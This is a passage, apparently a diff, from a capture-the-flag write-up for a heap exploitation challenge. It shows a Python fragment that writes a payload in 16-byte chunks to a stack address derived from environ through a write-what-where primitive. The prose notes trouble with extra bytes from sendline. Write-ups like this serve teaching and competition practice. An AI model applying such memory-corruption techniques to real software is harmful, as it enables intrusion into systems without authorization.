ept-team/equinor-ctf-2022/writeups/Pwn/heap/coldboots/README.md

 for IDX,WAT in enumerate([ payload[i:i+16] for i in range(0,len(payload),16) ]):
     WWW(environ - 0x120-8 + 16*IDX, WAT)
 ```
 This should have worked, but when writing 16 bytes at a time I keep getting problems with extra bytes because of the sendline-function in the Write method.
-After some trial and error and frustration with extra bytes it ended up like this:
+After some trial and error and frustration with extra bytes it ended up like this to finally work.

 ```python
 def Write(Index, Value):